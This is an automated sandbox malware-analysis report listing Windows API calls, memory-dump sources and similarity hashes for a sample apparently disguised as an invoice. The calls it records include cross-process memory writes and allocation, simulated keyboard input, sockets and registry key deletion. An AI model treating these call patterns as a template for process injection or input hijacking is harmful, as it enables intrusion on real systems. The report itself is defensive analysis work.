                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorHandling__87except__start
                                          • String ID: pow
                                          • API String ID: 2905807303-2276729525
                                          • Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                          • Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
                                          • Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                          • Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: 3cA$_A
                                          • API String ID: 4104443479-3480954128
                                          • Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                          • Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
                                          • Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                          • Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55
                                          APIs
                                            • Part of subcall function 004614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00459296,?,?,00000034,00000800,?,00000034), ref: 004614E6
                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0045983F
                                            • Part of subcall function 00461487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 004614B1
                                            • Part of subcall function 004613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00461409
                                            • Part of subcall function 004613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0045925A,00000034,?,?,00001004,00000000,00000000), ref: 00461419
                                            • Part of subcall function 004613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0045925A,00000034,?,?,00001004,00000000,00000000), ref: 0046142F
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004598AC
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004598F9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                          • String ID: @
                                          • API String ID: 4150878124-2766056989
                                          • Opcode ID: 25131a85ebe6ddc6b48413ca47e37c1e8c65e46d0e1ba382f06cbd4a7eab333c
                                          • Instruction ID: 83720f96416bb9890d74edf788c2ecf3a7fc11859df44560b8e2e1ee8df86db8
                                          • Opcode Fuzzy Hash: 25131a85ebe6ddc6b48413ca47e37c1e8c65e46d0e1ba382f06cbd4a7eab333c
                                          • Instruction Fuzzy Hash: 8E41627690021CBFDB10DFA5CC41EDEBBB8EB05300F14415AF945B7251DA746E89CBA5
                                          APIs
                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window
                                          • String ID: SysMonthCal32
                                          • API String ID: 2326795674-1439706946
                                          • Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                          • Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
                                          • Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                          • Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4
                                          APIs
                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$MoveWindow
                                          • String ID: Listbox
                                          • API String ID: 3315199576-2633736733
                                          • Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                          • Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
                                          • Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                          • Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4
                                          APIs
                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00487772
                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00487787
                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00487794
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: msctls_trackbar32
                                          • API String ID: 3850602802-1010561917
                                          • Opcode ID: 1c29657f45557683d1b312c07fddb74740427be331155a373290d3506167769a
                                          • Instruction ID: f92afa797eeb34fec66cc861e9e49cfc52a42a3b8dc3c72e421b2ad803853977
                                          • Opcode Fuzzy Hash: 1c29657f45557683d1b312c07fddb74740427be331155a373290d3506167769a
                                          • Instruction Fuzzy Hash: 78112732204208BEEF106F61CC01FDF7768EF88B54F21052EFA41A21A0C275F851CB24
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __calloc_crt
                                          • String ID: K$@BL
                                          • API String ID: 3494438863-2209178351
                                          • Opcode ID: 1dcb651b5103459d55ad6e63b5153fbe911c496dbbbddd92234eb52377e23d61
                                          • Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
                                          • Opcode Fuzzy Hash: 1dcb651b5103459d55ad6e63b5153fbe911c496dbbbddd92234eb52377e23d61
                                          • Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-3689287502
                                          • Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                          • Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
                                          • Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                          • Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-1355242751
                                          • Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                          • Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
                                          • Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                          • Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728
                                          APIs
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07
                                          Strings
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                          • API String ID: 2574300362-4033151799
                                          • Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                          • Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
                                          • Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                          • Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100
                                          Strings
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetModuleHandleExW$kernel32.dll
                                          • API String ID: 2574300362-199464113
                                          • Opcode ID: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                          • Instruction ID: 12f83e0466186043ebac617d8a25d984f844cdccf99b41ce397239b1d45cf92f
                                          • Opcode Fuzzy Hash: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                          • Instruction Fuzzy Hash: E6D0EC34510723DFD7209B35D81C64A76D4AF05751B51CC3E9485D6650E678D894C754
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: LocalTime__swprintf
                                          • String ID: %.3d$WIN_XPe
                                          • API String ID: 2070861257-2409531811
                                          • Opcode ID: 4c24db5f6d1ae0e835b3c0d7d74f6f6d97c26fe48fb6e8bef9c505129785ad3d
                                          • Instruction ID: f51e3ac8fae6d8955d529539db48231027d4147bdd6b48c6978ef66e561906ab
                                          • Opcode Fuzzy Hash: 4c24db5f6d1ae0e835b3c0d7d74f6f6d97c26fe48fb6e8bef9c505129785ad3d
                                          • Instruction Fuzzy Hash: D2D01271844118FAD7109B9098898F9737CA708301F600563B512A2050E23E9BD6E62E
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                          • Instruction ID: 13cbbea2f029a5b6ef5998baa1d0dcecb81b6aaeffd6b1af622dda72ce090ed1
                                          • Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                          • Instruction Fuzzy Hash: B9C19C74A04216EFCB14CFA4D884AAEBBB5FF48311B1085A9EC05DB352D734ED85DB94
                                          APIs
                                          • CharLowerBuffW.USER32(?,?), ref: 0047E0BE
                                          • CharLowerBuffW.USER32(?,?), ref: 0047E101
                                            • Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
                                          • _memmove.LIBCMT ref: 0047E314
                                          Similarity
                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                          • String ID:
                                          • API String ID: 3659485706-0
                                          • Opcode ID: a7ed02eeed9676c8fcd00d37da31e49e87575bae2c78420ee5dd29f87526a4dd
                                          • Instruction ID: 42d1ff19b42d4dd855f78dbf13e3d8c427035282adcdd002c13888698d5010eb
                                          • Opcode Fuzzy Hash: a7ed02eeed9676c8fcd00d37da31e49e87575bae2c78420ee5dd29f87526a4dd
                                          • Instruction Fuzzy Hash: 91C16A71604301DFC714DF29C48096ABBE4FF89318F148AAEF8999B352D734E946CB86
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 004780C3
                                          • CoUninitialize.OLE32 ref: 004780CE
                                            • Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                          • VariantInit.OLEAUT32(?), ref: 004780D9
                                          • VariantClear.OLEAUT32(?), ref: 004783AA
                                          Similarity
                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                          • String ID:
                                          • API String ID: 780911581-0
                                          • Opcode ID: 0f625460e1d8066da09c67e41f27514c9fba90c2366d23154bb5826f9ef884b6
                                          • Instruction ID: 8f3373c4a7a5232ad993fe33ba140746eecbff111afdbebb2f840ccc5d4b94f2
                                          • Opcode Fuzzy Hash: 0f625460e1d8066da09c67e41f27514c9fba90c2366d23154bb5826f9ef884b6
                                          • Instruction Fuzzy Hash: 2CA17C756047019FCB10EF15C485B6AB7E4BF89758F04845EF999AB3A2CB38EC05CB4A
                                          APIs
                                          Similarity
                                          • API ID: Variant$AllocClearCopyInitString
                                          • String ID:
                                          • API String ID: 2808897238-0
                                          • Opcode ID: 9292484c7ffc42eea317217bf5d4e68703bd19dcc1dd3ea756c411c8d1f4197a
                                          • Instruction ID: e8b204b61dde8909cc9ebe033208aa5324eaf332f6d31eb9d5c273134af525d6
                                          • Opcode Fuzzy Hash: 9292484c7ffc42eea317217bf5d4e68703bd19dcc1dd3ea756c411c8d1f4197a
                                          • Instruction Fuzzy Hash: 9551C5747003019BDB20AF66D49162AB3E5AF45315F61C82FE986EB293DA38DC49870D
                                          APIs
                                          • GetWindowRect.USER32(00C71D00,?), ref: 00489863
                                          • ScreenToClient.USER32(00000002,00000002), ref: 00489896
                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00489903
                                          Similarity
                                          • API ID: Window$ClientMoveRectScreen
                                          • String ID:
                                          • API String ID: 3880355969-0
                                          • Opcode ID: 64022f8d4441c5f1557efdd9fcc3a986e2e7d97cfab57cf70d5a2593d4a8891b
                                          • Instruction ID: e3f881a7cdcc43810cee46c2a40b043201eea1d37e41385612dd6f56ef4f9ac2
                                          • Opcode Fuzzy Hash: 64022f8d4441c5f1557efdd9fcc3a986e2e7d97cfab57cf70d5a2593d4a8891b
                                          • Instruction Fuzzy Hash: 6B513E74A00609AFCB10EF54C884ABE7BB5FF45360F14866EF855AB3A0D734AD91CB94
                                          APIs
                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
                                          • WSAGetLastError.WSOCK32(00000000), ref: 004769E1
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00476A51
                                          Similarity
                                          • API ID: ErrorLast$__itow__swprintfsocket
                                          • String ID:
                                          • API String ID: 2214342067-0
                                          • Opcode ID: 5f9ca6de3472ca1f7af679026d0f929c5a37830e5e67d00f46ee422ea10bce61
                                          • Instruction ID: c17afa0f8bd668a9c60690327d1e2da2a99666ddae487d2dea1163d2ceff8f1e
                                          • Opcode Fuzzy Hash: 5f9ca6de3472ca1f7af679026d0f929c5a37830e5e67d00f46ee422ea10bce61
                                          • Instruction Fuzzy Hash: A241C175740200AFEB50BF25CC86F6A37A49F05B18F04C56EFA59AB3C3DA789D008B59
                                          APIs
                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
                                          • _strlen.LIBCMT ref: 004764D9
                                          Similarity
                                          • API ID: _strlen
                                          • String ID:
                                          • API String ID: 4218353326-0
                                          • Opcode ID: f92aa70265d8cfa8456904e3018b373e308ad2a6be4037779746b4cd516bab6c
                                          • Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
                                          • Opcode Fuzzy Hash: f92aa70265d8cfa8456904e3018b373e308ad2a6be4037779746b4cd516bab6c
                                          • Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58
                                          APIs
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0046B89E
                                          • GetLastError.KERNEL32(?,00000000), ref: 0046B8C4
                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0046B8E9
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0046B915
                                          Similarity
                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                          • String ID:
                                          • API String ID: 3321077145-0
                                          • Opcode ID: 8c509dae0351cb0f1ead8c0d9691e3f66f8983daa8a4ab2c48e0df630e8b2899
                                          • Instruction ID: 5b86d2e11fb278bd4ab993ead48be06bf9d9dcf949e57147c6f090c5708de813
                                          • Opcode Fuzzy Hash: 8c509dae0351cb0f1ead8c0d9691e3f66f8983daa8a4ab2c48e0df630e8b2899
                                          • Instruction Fuzzy Hash: C441097A600610DFCB11EF15C444A59BBE1EF49314F05C0AAEC4AAB3A2DB38FD45CB99
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                          • Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
                                          • Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                          • Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 0048AB60
                                          • GetWindowRect.USER32(?,?), ref: 0048ABD6
                                          • PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                          • MessageBeep.USER32(00000000), ref: 0048AC57
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Rect$BeepClientMessageScreenWindow
                                          • String ID:
                                          • API String ID: 1352109105-0
                                          • Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                          • Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
                                          • Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                          • Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A
                                          APIs
                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                          • Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
                                          • Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
